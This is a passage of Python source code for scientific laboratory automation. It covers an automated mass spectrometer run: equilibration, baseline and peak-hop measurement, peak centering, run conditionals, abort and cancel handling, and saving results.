self.debug('set "{}" to "{}"'.format(iso.detector, fi))
def py_get_spectrometer_parameter(self, name):
self.info('getting spectrometer parameter {}'.format(name))
if self.spectrometer_manager:
return self.spectrometer_manager.spectrometer.get_parameter(name)
def py_set_spectrometer_parameter(self, name, v):
self.info('setting spectrometer parameter {} {}'.format(name, v))
if self.spectrometer_manager:
self.spectrometer_manager.spectrometer.set_parameter(name, v)
def py_raw_spectrometer_command(self, cmd):
if self.spectrometer_manager:
self.spectrometer_manager.spectrometer.ask(cmd)
def py_data_collection(self, obj, ncounts, starttime, starttime_offset, series=0, fit_series=0, group='signal',
integration_time=None):
if not self._alive:
return
if self.plot_panel:
self.plot_panel.is_baseline = False
self.plot_panel.show_isotope_graph()
self.persister.build_tables(group, self._active_detectors, ncounts)
self.multi_collector.is_baseline = False
self.multi_collector.fit_series_idx = fit_series
check_conditionals = obj == self.measurement_script
if integration_time:
self.set_integration_time(integration_time)
result = self._measure(group,
self.persister.get_data_writer(group),
ncounts, starttime, starttime_offset,
series,
check_conditionals, self.signal_color, obj)
return result
def py_post_equilibration(self, **kw):
self.do_post_equilibration(**kw)
def py_equilibration(self, eqtime=None, inlet=None, outlet=None,
do_post_equilibration=True,
close_inlet=True,
delay=None):
evt = TEvent()
if not self._alive:
evt.set()
return evt
self.heading('Equilibration Started')
t = Thread(name='equilibration', target=self._equilibrate, args=(evt,),
kwargs=dict(eqtime=eqtime,
inlet=inlet,
outlet=outlet,
delay=delay,
close_inlet=close_inlet,
do_post_equilibration=do_post_equilibration))
t.setDaemon(True)
t.start()
return evt
def py_sniff(self, ncounts, starttime, starttime_offset, series=0, block=True):
if block:
return self._sniff(ncounts, starttime, starttime_offset, series)
else:
t = Thread(target=self._sniff,
name='sniff',
args=(ncounts, starttime, starttime_offset, series))
t.setDaemon(True)
t.start()
return True
def py_baselines(self, ncounts, starttime, starttime_offset, mass, detector,
series=0, fit_series=0, settling_time=4, integration_time=None, use_dac=False):
if not self._alive:
return
gn = 'baseline'
self.debug('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Baseline')
self.persister.build_tables(gn, self._active_detectors, ncounts)
ion = self.ion_optics_manager
if mass:
if ion is not None:
if detector is None:
detector = self._active_detectors[0].name
ion.position(mass, detector, use_dac=use_dac)
msg = 'Delaying {}s for detectors to settle'.format(settling_time)
self.info(msg)
if self.plot_panel:
self.plot_panel.total_counts += settling_time
self.plot_panel.total_seconds += settling_time
self.wait(settling_time, msg)
if self.plot_panel:
# self.plot_panel.set_ncounts(ncounts)
self.plot_panel.is_baseline = True
self.plot_panel.show_baseline_graph()
self.multi_collector.is_baseline = True
self.multi_collector.fit_series_idx = fit_series
check_conditionals = True
self.collector.for_peak_hop = self.plot_panel.is_peak_hop
self.plot_panel.is_peak_hop = False
if integration_time:
self.set_integration_time(integration_time)
result = self._measure(gn,
self.persister.get_data_writer(gn),
ncounts, starttime,
starttime_offset,
series,
check_conditionals, self.baseline_color)
if self.plot_panel:
bs = dict([(iso.name, (iso.detector, iso.baseline.uvalue)) for iso in
self.isotope_group.values()])
# self.set_previous_baselines(bs)
self.executor_event = {'kind': 'baselines', 'baselines': bs}
self.plot_panel.is_baseline = False
self.multi_collector.is_baseline = False
return result
def py_define_hops(self, hopstr):
"""
set the detector each isotope
add additional isotopes and associated plots if necessary
"""
if self.plot_panel is None:
self.plot_panel = self._new_plot_panel(self.plot_panel, stack_order='top_to_bottom')
self.plot_panel.is_peak_hop = True
a = self.isotope_group
g = self.plot_panel.isotope_graph
g.clear()
self.measurement_script.reset_series()
hops = parse_hops(hopstr, ret='iso,det,is_baseline')
for iso, det, is_baseline in hops:
if is_baseline:
continue
name = iso
if name in a.isotopes:
ii = a.isotopes[name]
if ii.detector != det:
name = '{}{}'.format(iso, det)
ii = a.isotope_factory(name=iso, detector=det)
else:
ii = a.isotope_factory(name=name, detector=det)
pid = self._get_plot_id_by_ytitle(g, name)
if pid is None:
plot = self.plot_panel.new_isotope_plot()
pid = g.plots.index(plot)
else:
plot = g.plots[pid]
plot.y_axis.title = name
g.set_regressor(ii.regressor, pid)
a.isotopes[name] = ii
self._load_previous()
self.plot_panel.analysis_view.load(self)
# map_mass = self.spectrometer_manager.spectrometer.map_mass
# hops = [(map_mass(hi[0]),) + tuple(hi) for hi in hops]
#
# for mass, dets in groupby_key(hops, key=itemgetter(0), reverse=True):
# dets = list(dets)
# iso = dets[0][1]
# if dets[0][3]:
# continue
#
# for _, _, di, _ in dets:
# self._add_active_detector(di)
# name = iso
# if iso in a.isotopes:
# ii = a.isotopes[iso]
# if ii.detector != di:
# name = '{}{}'.format(iso, di)
# ii = a.isotope_factory(name=name, detector=di)
# else:
# ii = a.isotope_factory(name=iso, detector=di)
#
# pid = self._get_plot_id_by_ytitle(g, ii, di)
# if pid is None:
# plots = self.plot_panel.new_isotope_plot()
# plot = plots['isotope']
# pid = g.plots.index(plot)
#
# # this line causes and issue when trying to plot the sniff on the isotope graph
# # g.new_series(type='scatter', fit='linear', plotid=pid)
#
# g.set_regressor(ii.regressor, pid)
# a.isotopes[name] = ii
# plot.y_axis.title = name
#
# self._load_previous()
#
# self.plot_panel.analysis_view.load(self)
def py_peak_hop(self, cycles, counts, hops, mftable, starttime, starttime_offset, series=0, fit_series=0,
group='signal'):
if not self._alive:
return
with self.ion_optics_manager.mftable_ctx(mftable):
is_baseline = False
self.peak_hop_collector.is_baseline = is_baseline
self.peak_hop_collector.fit_series_idx = fit_series
if self.plot_panel:
self.plot_panel.trait_set(is_baseline=is_baseline, _ncycles=cycles, hops=hops)
self.plot_panel.show_isotope_graph()
# required for mass spec
self.persister.save_as_peak_hop = True
self.is_peak_hop = True
check_conditionals = True
self._add_conditionals()
ret = self._peak_hop(cycles, counts, hops, group,
starttime, starttime_offset, series,
check_conditionals)
self.is_peak_hop = False
return ret
def py_peak_center(self, detector=None, save=True, isotope=None,
directions='Increase', config_name='default',
check_intensity=None,
peak_center_threshold=None,
peak_center_threshold_window=None,
**kw):
if not self._alive:
return
if check_intensity is None:
check_intensity = self.use_peak_center_threshold
if peak_center_threshold is None:
peak_center_threshold = self.peak_center_threshold
if peak_center_threshold_window is None:
peak_center_threshold_window = self.peak_center_threshold_window
ion = self.ion_optics_manager
if ion is not None:
if self.isotope_group and check_intensity:
iso = self.isotope_group.get_isotope(isotope, detector)
if iso:
ys = iso.ys[-peak_center_threshold_window:]
ym = ys.mean()
self.debug('peak center: mean={} threshold={}'.format(ym, self.peak_center_threshold))
if ym < peak_center_threshold:
self.warning(
'Skipping peak center. intensities too small. {}<{}'.format(ym, self.peak_center_threshold))
return
else:
self.debug('No isotope="{}", Det="{}" in isotope group. {}'.format(isotope, detector,
self.isotope_group.isotope_keys))
if not self.plot_panel:
p = self._new_plot_panel(self.plot_panel, stack_order='top_to_bottom')
self.plot_panel = p
self.debug('peak center started')
ad = [di.name for di in self._peak_center_detectors
if di.name != detector]
pc = ion.setup_peak_center(detector=[detector] + ad,
plot_panel=self.plot_panel,
isotope=isotope,
directions=directions,
config_name=config_name,
use_configuration_dac=False,
**kw)
self.peak_center = pc
self.debug('do peak center. {}'.format(pc))
ion.do_peak_center(new_thread=False, save=save, message='automated run peakcenter', timeout=300)
self._update_persister_spec(peak_center=pc)
if pc.result:
self.persister.save_peak_center_to_file(pc)
def py_coincidence_scan(self):
pass
# sm = self.spectrometer_manager
# obj, t = sm.do_coincidence_scan()
# self.coincidence_scan = obj
# t.join()
# ===============================================================================
# conditionals
# ===============================================================================
def py_add_cancelation(self, **kw):
"""
cancel experiment if teststr evaluates to true
"""
self._conditional_appender('cancelation', kw, CancelationConditional, level=RUN,
location=self.measurement_script.name)
def py_add_action(self, **kw):
"""
attr must be an attribute of arar_age
perform a specified action if teststr evaluates to true
"""
self._conditional_appender('action', kw, ActionConditional, level=RUN,
location=self.measurement_script.name)
def py_add_termination(self, **kw):
"""
attr must be an attribute of arar_age
terminate run and continue experiment if teststr evaluates to true
"""
self._conditional_appender('termination', kw, TerminationConditional, level=RUN,
location=self.measurement_script.name)
def py_add_truncation(self, **kw):
"""
attr must be an attribute of arar_age
truncate measurement and continue run if teststr evaluates to true
default kw:
attr='', comp='',start_count=50, frequency=5,
abbreviated_count_ratio=1.0
"""
self._conditional_appender('truncation', kw, TruncationConditional, level=RUN,
location=self.measurement_script.name)
def py_clear_conditionals(self):
self.debug('$$$$$ Clearing conditionals')
self.py_clear_terminations()
self.py_clear_truncations()
self.py_clear_actions()
self.py_clear_cancelations()
def py_clear_cancelations(self):
self.cancelation_conditionals = []
def py_clear_terminations(self):
self.termination_conditionals = []
def py_clear_truncations(self):
self.truncation_conditionals = []
def py_clear_actions(self):
self.action_conditionals = []
def py_clear_modifications(self):
self.modification_conditionals = []
# ===============================================================================
# run termination
# ===============================================================================
def set_end_after(self):
self.is_last = True
self.executor_event = {'kind': 'end_after'}
def abort_run(self, do_post_equilibration=True):
self._aborted = True
self.debug('Abort run do_post_equilibration={}'.format(do_post_equilibration))
self._persister_action('trait_set', save_enabled=False)
for s in EM_SCRIPT_KEYS:
script = getattr(self, '{}_script'.format(s))
if script is not None:
script.abort()
if self.peak_center:
self.debug('cancel peak center')
self.peak_center.cancel()
self.do_post_termination(do_post_equilibration=do_post_equilibration)
self.finish()
if self.spec.state != 'not run':
self.spec.state = 'aborted'
self.experiment_queue.refresh_table_needed = True
def cancel_run(self, state='canceled', do_post_equilibration=True):
"""
terminate the measurement script immediately
do post termination
post_eq and post_meas
don't save run
"""
self.debug('Cancel run state={} do_post_equilibration={}'.format(state, do_post_equilibration))
self.collector.canceled = True
self._persister_action('trait_set', save_enabled=False)
for s in EM_SCRIPT_KEYS:
script = getattr(self, '{}_script'.format(s))
if script is not None:
script.cancel()
if self.peak_center:
self.debug('cancel peak center')
self.peak_center.cancel()
self.do_post_termination(do_post_equilibration=do_post_equilibration)
self.finish()
if state:
if self.spec.state != 'not run':
self.spec.state = state
self.experiment_queue.refresh_table_needed = True
def truncate_run(self, style='normal'):
"""
truncate the measurement script
style:
normal- truncate current measure iteration and continue
quick- truncate current measure iteration use truncated_counts for following
measure iterations
"""
if self.measuring:
style = style.lower()
if style == 'normal':
self.measurement_script.truncate('normal')
elif style == 'quick':
self.measurement_script.truncate('quick')
self.collector.set_truncated()
self.truncated = True
self.spec.state = 'truncated'
self.experiment_queue.refresh_table_needed = True
# ===============================================================================
#
# ===============================================================================
def show_conditionals(self, tripped=None):
self.tripped_conditional = tripped
self.executor_event = {'kind': 'show_conditionals', 'tripped': tripped}
def teardown(self):
self.debug('tear down')
if self.measurement_script:
self.measurement_script.automated_run = None
if self.extraction_script:
self.extraction_script.automated_run = None
if self.collector:
self.collector.automated_run = None
if self.plot_panel:
self.plot_panel.automated_run = None
self._persister_action('trait_set', persistence_spec=None, monitor=None)
def finish(self):
self.debug('----------------- finish -----------------')
if self.monitor:
self.monitor.stop()
if self.spec:
if self.spec.state not in ('not run', 'canceled', 'success', 'truncated', 'aborted'):
self.spec.state = 'failed'
self.experiment_queue.refresh_table_needed = True
self.spectrometer_manager.spectrometer.active_detectors = []
self.stop()
def stop(self):
self.debug('----------------- stop -----------------')
self._alive = False
self.collector.stop()
def start(self):
self.debug('----------------- start -----------------')
self._aborted = False
self.persistence_spec = PersistenceSpec()
for p in (self.persister, self.xls_persister, self.dvc_persister):
if p is not None:
p.per_spec = self.persistence_spec
if self.monitor is None:
return self._start()
if self.monitor.monitor():
try:
return self._start()
except AttributeError as e:
self.warning('failed starting run: {}'.format(e))
else:
self.warning('failed to start monitor')
def is_alive(self):
return self._alive
def heading(self, msg, color=None, *args, **kw):
super(AutomatedRun, self).info(msg, *args, **kw)
if color is None:
color = self.info_color
if color is None:
color = 'light green'
self.executor_event = {'kind': 'heading', 'message': msg, 'color': color, 'log': False}
def info(self, msg, color=None, *args, **kw):
super(AutomatedRun, self).info(msg, *args, **kw)
if color is None:
color = self.info_color
if color is None:
color = 'light green'
self.executor_event = {'kind': 'info', 'message': msg, 'color': color, 'log': False}
def get_interpolation_value(self, value):
"""
value is a string in the format of $VALUE. Search for VALUE first in the options file
then in the extraction scripts metadata
:param value:
:return:
"""
v = None
if self.extraction_script:
for vv in (value, value.upper(), value.lower()):
try:
v = getattr(self.extraction_script, vv)
except AttributeError:
v = self._get_extraction_parameter(vv, None)
if v is None:
continue
break
if v is None:
self.warning('Could not interpolate {}. Make sure value is defined in either the options file'
'or embedded in the extraction scripts metadata. Defaulting to 0'.format(value))
v = 0
return v
def get_ratio(self, r, non_ic_corr=True):
if self.isotope_group:
return self.isotope_group.get_ratio(r, non_ic_corr=non_ic_corr)
def get_reference_peakcenter_result(self):
if self.persistence_spec:
pc = self.persistence_spec.peak_center
if pc:
rn = pc.reference_detector.name
return pc.get_result(rn)
def get_device_value(self, dev_name):
return self.extraction_line_manager.get_device_value(dev_name)
def get_pressure(self, attr):
controller, name = attr.split('.')
return self.extraction_line_manager.get_pressure(controller, name)
def get_deflection(self, det, current=False):
return self.spectrometer_manager.spectrometer.get_deflection(det, current)
def get_detector(self, det):
return self.spectrometer_manager.spectrometer.get_detector(det)
def set_integration_time(self, v):
spectrometer = self.spectrometer_manager.spectrometer
nv = spectrometer.set_integration_time(v, force=True)
self._integration_seconds = nv
def set_magnet_position(self, *args, **kw):
return self._set_magnet_position(*args, **kw)
def set_deflection(self, det, defl):
self.spectrometer_manager.set_deflection(det, defl)
def protect_detector(self, det, protect):
self.spectrometer_manager.protect_detector(det, protect)
def wait(self, t, msg=''):
self.executor_event = {'kind': 'wait', 'duration': t, 'message': msg}
def wait_for_overlap(self):
"""
by default overlap_evt is set
after equilibration finished
"""
self.info('waiting for overlap signal')
self._alive = True
self.overlap_evt = evt = TEvent()
evt.clear()
i = 1
st = time.time()
while self._alive and not evt.is_set():
time.sleep(1)
if i % 5 == 0:
et = time.time() - st
self.debug('waiting for overlap signal. elapsed time={:0.2f}'.format(et))
i = 0
i += 1
if not self._alive:
return
self.info('overlap signal set')
overlap, mp = self.spec.overlap
self.info('starting overlap delay {}'.format(overlap))
starttime = time.time()
i = 1
while self._alive:
et = time.time() - starttime
if et > overlap:
break
time.sleep(1.0)
if i % 50 == 0:
self.debug('waiting overlap delay {}. elapsed time={:0.2f}'.format(overlap, et))
i = 0
i += 1
def post_finish(self):
if self.use_dvc_persistence:
if self.log_path:
self.dvc_persister.save_run_log_file(self.log_path)
else:
self.debug('no log path to save')
def save(self):
self.debug('post measurement save measured={} aborted={}'.format(self._measured, self._aborted))
if self._measured and not self._aborted:
# set filtering
self._set_filtering()
conds = (self.termination_conditionals, self.truncation_conditionals,
self.action_conditionals, self.cancelation_conditionals, self.modification_conditionals)
env = self._get_environmentals()
if env:
set_environmentals(self.spec, env)
self._update_persister_spec(active_detectors=self._active_detectors,
conditionals=[c for cond in conds for c in cond],
tripped_conditional=self.tripped_conditional, **env)
# save to database
self._persister_save_action('post_measurement_save')
self.spec.new_result(self)
if self.plot_panel:
self.plot_panel.analysis_view.refresh_needed = True
if self.persister.secondary_database_fail:
self.executor_event = {'kind': 'cancel', 'cancel_run': True,
'msg': self.persister.secondary_database_fail}
else:
return True
else:
return True
# ===============================================================================
# setup
# ===============================================================================
def setup_persister(self):
sens = self._get_extraction_parameter('sensitivity_multiplier', default=1)
# setup persister. mirror a few of AutomatedRunsAttributes
script_name, script_blob = self._assemble_script_blob()
eqn, eqb = '', ''
queue = self.experiment_queue
eqn = queue.name
auto_save_detector_ic = queue.auto_save_detector_ic
self.debug('$$$$$$$$$$$$$$$ auto_save_detector_ic={}'.format(auto_save_detector_ic))
ext_name, ext_blob = '', ''
if self.extraction_script:
ext_name = self.extraction_script.name
ext_blob = self._assemble_extraction_blob()
ms_name, ms_blob, sfods, bsfods = '', '', {}, {}
hops_name, hops_blob = '', ''
if self.measurement_script:
ms_name = self.measurement_script.name
ms_blob = self.measurement_script.toblob()
hops_name = self.measurement_script.hops_name
hops_blob = self.measurement_script.hops_blob
sfods, bsfods = self._get_default_fods()
pe_name, pe_blob = '', ''
if self.post_equilibration_script:
pe_name = self.post_equilibration_script.name
pe_blob = self.post_equilibration_script.toblob()
pm_name, pm_blob = '', ''
if self.post_measurement_script:
pm_name = self.post_measurement_script.name
pm_blob = self.post_measurement_script.toblob()
ext_pos = []
if self.extraction_script:
ext_pos = self.extraction_script.get_extraction_positions()
self._update_persister_spec(save_as_peak_hop=False,
run_spec=self.spec,
isotope_group=self.isotope_group,
positions=self.spec.get_position_list(),
auto_save_detector_ic=auto_save_detector_ic,
extraction_positions=ext_pos,
sensitivity_multiplier=sens,
experiment_type=self.experiment_type,
experiment_queue_name=eqn,
experiment_queue_blob=eqb,
extraction_name=ext_name,
extraction_blob=ext_blob,
measurement_name=ms_name,
measurement_blob=ms_blob,
post_measurement_name=pm_name,
post_measurement_blob=pm_blob,
post_equilibration_name=pe_name,
post_equilibration_blob=pe_blob,
hops_name=hops_name,
hops_blob=hops_blob,
runscript_name=script_name,
runscript_blob=script_blob,
signal_fods=sfods,
baseline_fods=bsfods,
intensity_scalar=self.intensity_scalar,
laboratory=self.laboratory,
instrument_name=self.instrument_name)
# ===============================================================================
# doers
# ===============================================================================
def start_extraction(self):
return self._start_script(EXTRACTION)
def start_measurement(self):
return self._start_script(MEASUREMENT)
def do_extraction(self):
self.debug('do extraction')
self._persister_action('pre_extraction_save')
self.info_color = EXTRACTION_COLOR
script = self.extraction_script
msg = 'Extraction Started {}'.format(script.name)
self.heading('{}'.format(msg))
self.spec.state = 'extraction'
self.experiment_queue.refresh_table_needed = True
self.debug('DO EXTRACTION {}'.format(self.runner))
script.set_run_identifier(self.runid)
queue = self.experiment_queue
script.set_load_identifier(queue.load_name)
syn_extractor = None
if script.syntax_ok(warn=False):
if self.use_syn_extraction and self.spec.syn_extraction:
p = os.path.join(paths.scripts_dir, 'syn_extraction', self.spec.syn_extraction)
p = add_extension(p, '.yaml')
if os.path.isfile(p):
from pychron.experiment.automated_run.syn_extraction import SynExtractionCollector
dur = script.calculate_estimated_duration(force=True)
syn_extractor = SynExtractionCollector(arun=weakref.ref(self)(),
path=p,
extraction_duration=dur)
syn_extractor.start()
else:
self.warning(
'Cannot start syn extraction collection. Configuration file does not exist. {}'.format(p))
else:
self.warning('Invalid script syntax for "{}"'.format(script.name))
return
try:
ex_result = script.execute()
except ExtractionException as e:
ex_result = False
self.debug('extraction exception={}'.format(e))
if ex_result:
if syn_extractor:
syn_extractor.stop()
# report the extraction results
ach, req = script.output_achieved()
self.info('Requested Output= {:0.3f}'.format(req))
self.info('Achieved Output= {:0.3f}'.format(ach))
rblob = script.get_response_blob()
oblob = script.get_output_blob()
sblob = script.get_setpoint_blob()
snapshots = script.snapshots
videos = script.videos
grain_polygons = script.get_grain_polygons() or []
self.debug('grain polygons n={}'.format(len(grain_polygons)))
pid = script.get_active_pid_parameters()
self._update_persister_spec(pid=pid or '',
grain_polygons=grain_polygons,
power_achieved=ach,
response_blob=rblob,
output_blob=oblob,
setpoint_blob=sblob,
snapshots=snapshots,
videos=videos)
self._persister_save_action('post_extraction_save')
self.heading('Extraction Finished')
self.info_color = None
# if overlapping need to wait for previous runs min mass spec pump time
self._wait_for_min_ms_pumptime()
else:
if syn_extractor:
syn_extractor.stop()
self.do_post_equilibration()
self.do_post_measurement()
self.finish()
self.heading('Extraction Finished unsuccessfully', color='red')
self.info_color = None
return bool(ex_result)
def do_measurement(self, script=None, use_post_on_fail=True):
self.debug('do measurement')
self.debug('L#={} analysis type={}'.format(self.spec.labnumber,
self.spec.analysis_type))
if not self._alive:
self.warning('run is not alive')
return
if script is None:
script = self.measurement_script
if script is None:
self.warning('no measurement script')
return
# use a measurement_script to explicitly define
# measurement sequence
self.info_color = MEASUREMENT_COLOR
msg = 'Measurement Started {}'.format(script.name)
self.heading('{}'.format(msg))
self.spec.state = MEASUREMENT
self.experiment_queue.refresh_table_needed = True
# get current spectrometer values
sm = self.spectrometer_manager
if sm:
self.debug('setting trap, emission, spec, defl, and gains')
self._update_persister_spec(spec_dict=sm.make_configuration_dict(),
defl_dict=sm.make_deflections_dict(),
settings=sm.make_settings(),
gains=sm.make_gains_dict(),
trap=sm.read_trap_current(),
emission=sm.read_emission())
self._persister_action('pre_measurement_save')
self.measuring = True
self._persister_action('trait_set', save_enabled=True)
if script.execute():
# mem_log('post measurement execute')
self.heading('Measurement Finished')
self.measuring = False
self.info_color = None
self._measured = True
return True
else:
if use_post_on_fail:
self.do_post_equilibration()
self.do_post_measurement()
self.finish()
self.heading('Measurement Finished unsuccessfully. Aborted={}'.format(self._aborted), color='red')
self.measuring = False
self.info_color = None
return self._aborted
def do_post_measurement(self, script=None):
if script is None:
script = self.post_measurement_script
if not script:
return True
if not self._alive:
return
msg = 'Post Measurement Started {}'.format(script.name)
self.heading('{}'.format(msg))
if script.execute():
self.debug('setting _ms_pumptime')
self.executor_event = {'kind': 'ms_pumptime_start', 'time': time.time()}
self.heading('Post Measurement Finished')
return True
else:
self.heading('Post Measurement Finished unsuccessfully')
return False
def do_post_equilibration(self, block=False):
if block:
self._post_equilibration()
else:
t = Thread(target=self._post_equilibration,
name='post_equil')
t.setDaemon(True)
t.start()
def do_post_termination(self, do_post_equilibration=True):
self.heading('Post Termination Started')
if do_post_equilibration:
self.do_post_equilibration()
self.do_post_measurement()
self.stop()
self.heading('Post Termination Finished')
# ===============================================================================
# utilities
# ===============================================================================
def get_current_dac(self):
return self.spectrometer_manager.spectrometer.magnet.dac
def assemble_report(self):
signal_string = ''
signals = self.get_baseline_corrected_signals()
if signals:
signal_string = '\n'.join(['{} {} {}'.format(ai.name, ai.isotope,
signals[ai.isotope])
for ai in self._active_detectors])
age = ''
if self.isotope_group:
age = self.isotope_group.age
age_string = 'age={}'.format(age)
return '''runid={} timestamp={} {}
anaylsis_type={}
# ===============================================================================
# signals
# ===============================================================================
{}
{}
'''.format(self.runid, self.persister.rundate, self.persister.runtime,
self.spec.analysis_type,
signal_string, age_string)
def get_baseline_corrected_signals(self):
if self.isotope_group:
d = dict()
for k, iso in self.isotope_group.items():
d[k] = (iso.detector, iso.get_baseline_corrected_value())
return d
def setup_context(self, *args, **kw):
self._setup_context(*args, **kw)
def refresh_scripts(self):
self._refresh_scripts()
def update_detector_isotope_pairing(self, detectors, isotopes):
self.debug('update detector isotope pairing')
self.debug('detectors={}'.format(detectors))
self.debug('isotopes={}'.format(isotopes))
for di in self._active_detectors:
di.isotope = ''
for di, iso in zip(detectors, isotopes):
self.debug('updating pairing {} - {}'.format(di, iso))
det = self.get_detector(di)
det.isotope = iso
# ===============================================================================
# private
# ===============================================================================
def _get_environmentals(self):
self.info('getting environmentals')
env = {}
lclient = self.labspy_client
tst = time.time()
if lclient:
if lclient.connect():
for tag in ('lab_temperatures', 'lab_humiditys', 'lab_pneumatics'):
st = time.time()
try:
env[tag] = getattr(lclient, 'get_latest_{}'.format(tag))()
self.debug('Get latest {}. elapsed: {}'.format(tag, time.time() - st))
except BaseException as e:
self.debug('Get Labspy Environmentals: {}'.format(e))
self.debug_exception()
else:
self.debug('failed to connect to labspy client. Could not retrieve environmentals')
self.debug('Environmentals: {}'.format(pformat(env)))
else:
self.debug('LabspyClient not enabled. Could not retrieve environmentals')
self.info('getting environmentals finished: total duration: {}'.format(time.time() - tst))
return env
def _start(self):
# for testing only
# self._get_environmentals()
if self.isotope_group is None:
# load arar_age object for age calculation
if self.experiment_type == AR_AR:
from pychron.processing.arar_age import ArArAge
klass = ArArAge
else:
from pychron.processing.isotope_group import IsotopeGroup
klass = IsotopeGroup
self.isotope_group = klass()
es = self.extraction_script
if es is not None:
# get sensitivity multiplier from extraction script
v = self._get_yaml_parameter(es, 'sensitivity_multiplier', default=1)
self.isotope_group.sensitivity_multiplier = v
ln = self.spec.labnumber
ln = convert_identifier(ln)
self.debug('**************** Experiment Type: {}, {}'.format(self.experiment_type, AR_AR))
if self.experiment_type == AR_AR:
if not self.datahub.load_analysis_backend(ln, self.isotope_group):
self.debug('failed load analysis backend')
return
self.isotope_group.calculate_decay_factors()
self.py_clear_conditionals()
# setup default/queue conditionals
# clear the conditionals for good measure.
# conditionals should be cleared during teardown.
try:
self._add_conditionals()
except BaseException as e:
self.warning('Failed adding conditionals {}'.format(e))
return
try:
# add queue conditionals
self._add_queue_conditionals()
except BaseException as e:
self.warning('Failed adding queue conditionals. err={}'.format(e))
return
try:
# add default conditionals
self._add_system_conditionals()
except BaseException as e:
self.warning('Failed adding system conditionals. err={}'.format(e))
return
self.info('Start automated run {}'.format(self.runid))
self.measuring = False
self.truncated = False
self._alive = True
if self.plot_panel:
self.plot_panel.start()
# self.plot_panel.set_analysis_view(self.experiment_type)
self.multi_collector.canceled = False
self.multi_collector.is_baseline = False
self.multi_collector.for_peak_hop = False
self._equilibration_done = False
# setup the scripts
ip = self.spec.script_options
if ip:
ip = os.path.join(paths.scripts_dir, 'options', add_extension(ip, '.yaml'))
if self.measurement_script:
self.measurement_script.reset(self)
# set the interpolation path
self.measurement_script.interpolation_path = ip
for si in ('extraction', 'post_measurement', 'post_equilibration'):
script = getattr(self, '{}_script'.format(si))
if script:
self._setup_context(script)
script.interpolation_path = ip
# load extraction metadata
self.eqtime = self._get_extraction_parameter('eqtime', -1)
self.time_zero_offset = self.spec.collection_time_zero_offset
# setup persister. mirror a few of AutomatedRunsAttributes
self.setup_persister()
return True
def _set_filtering(self):
self.debug('Set filtering')
def _get_filter_outlier_dict(iso, kind):
if kind == 'baseline':
fods = self.persistence_spec.baseline_fods
key = iso.detector
else:
fods = self.persistence_spec.signal_fods
key = iso.name
try:
fod = fods[key]
except KeyError:
fod = {'filter_outliers': False, 'iterations': 1, 'std_devs': 2}
return fod
for i in self.isotope_group.values():
fod = _get_filter_outlier_dict(i, 'signal')
self.debug('setting fod for {}= {}'.format(i.name, fod))
i.set_filtering(fod)
fod = _get_filter_outlier_dict(i, 'baseline')
i.baseline.set_filtering(fod)
self.debug('setting fod for {}= {}'.format(i.detector, fod))
def _update_persister_spec(self, **kw):
ps = self.persistence_spec
for k, v in kw.items():
try:
ps.trait_set(**{k: v})
except TraitError as e:
self.warning('failed setting persistence spec attr={}, value={} error={}'.format(k, v, e))
def _persister_save_action(self, func, *args, **kw):
self.debug('persistence save...')
if self.use_db_persistence:
self.debug('persistence save - db')
getattr(self.persister, func)(*args, **kw)
if self.use_dvc_persistence:
self.debug('persistence save - dvc')
getattr(self.dvc_persister, func)(*args, **kw)
if self.use_xls_persistence:
self.debug('persistence save - xls')
getattr(self.xls_persister, func)(*args, **kw)
def _persister_action(self, func, *args, **kw):
getattr(self.persister, func)(*args, **kw)
for i, p in enumerate((self.xls_persister, self.dvc_persister)):
if p is None:
continue
try:
getattr(p, func)(*args, **kw)
except BaseException as e:
self.warning('{} persister action failed. {} func={}, excp={}'.format(i, p.__class__.__name__,
func, e))
import traceback
traceback.print_exc()
def _post_equilibration(self):
if self._equilibration_done:
return
self._equilibration_done = True
if not self._alive:
return
if self.post_equilibration_script is None:
return
msg = 'Post Equilibration Started {}'.format(self.post_equilibration_script.name)
self.heading('{}'.format(msg))
if self.post_equilibration_script.execute():
self.heading('Post Equilibration Finished')
else:
self.heading('Post Equilibration Finished unsuccessfully')
def _generate_ic_mftable(self, detectors, refiso, peak_center_config, n):
ret = True
from pychron.experiment.ic_mftable_generator import ICMFTableGenerator
e = ICMFTableGenerator()
if not e.make_mftable(self, detectors, refiso, peak_center_config, n):
ret = False
return ret
def _add_system_conditionals(self):
self.debug('add default conditionals')
p = get_path(paths.spectrometer_dir, '.*conditionals', ('.yaml', '.yml'))
if p is not None:
self.info('adding default conditionals from {}'.format(p))
self._add_conditionals_from_file(p, level=SYSTEM)
else:
self.warning('no Default Conditionals file. {}'.format(p))
def _add_queue_conditionals(self):
"""
load queue global conditionals (truncations, actions, terminations)
"""
self.debug('Add queue conditionals')
name = self.spec.queue_conditionals_name
if test_queue_conditionals_name(name):
p = get_path(paths.queue_conditionals_dir, name, ('.yaml', '.yml'))
if p is not None:
self.info('adding queue conditionals from {}'.format(p))
self._add_conditionals_from_file(p, level=QUEUE)
else:
self.warning('Invalid Conditionals file. {}'.format(p))
def _add_conditionals_from_file(self, p, level=None):
d = conditionals_from_file(p, level=level)
for k, v in d.items():
if k in ('actions', 'truncations', 'terminations', 'cancelations'):
var = getattr(self, '{}_conditionals'.format(k[:-1]))
var.extend(v)
def _conditional_appender(self, name, cd, klass, level=None, location=None):
if not self.isotope_group:
self.warning('No ArArAge to use for conditional testing')
return
attr = cd.get('attr')
if not attr:
self.debug('no attr for this {} cd={}'.format(name, cd))
return
if attr == 'age' and self.spec.analysis_type not in ('unknown', 'cocktail'):
self.debug('not adding because analysis_type not unknown or cocktail')
# don't check if isotope_group has the attribute. it may be added to isotope group later
obj = getattr(self, '{}_conditionals'.format(name))
con = conditional_from_dict(cd, klass, level=level, location=location)
if con:
self.info('adding {} attr="{}" '
'test="{}" start="{}"'.format(name, con.attr, con.teststr, con.start_count))
obj.append(con)
else:
self.warning('Failed adding {}, {}'.format(name, cd))
def _refresh_scripts(self):
for name in SCRIPT_KEYS:
setattr(self, '{}_script'.format(name), self._load_script(name))
def _get_default_fits_file(self):
p = self._get_measurement_parameter('default_fits')
if p:
dfp = os.path.join(paths.fits_dir, add_extension(p, '.yaml'))
if os.path.isfile(dfp):
return dfp
else:
self.warning_dialog('Cannot open default fits file: {}'.format(dfp))
def _get_default_fits(self, is_baseline=False):
"""
get name of default fits file from measurement docstr
return dict of iso:fit pairs
"""
dfp = self._get_default_fits_file()
if dfp:
self.debug('using default fits file={}'.format(dfp))
yd = yload(dfp)
key = 'baseline' if is_baseline else 'signal'
fd = {yi['name']: (yi['fit'], yi['error_type']) for yi in yd[key]}
else:
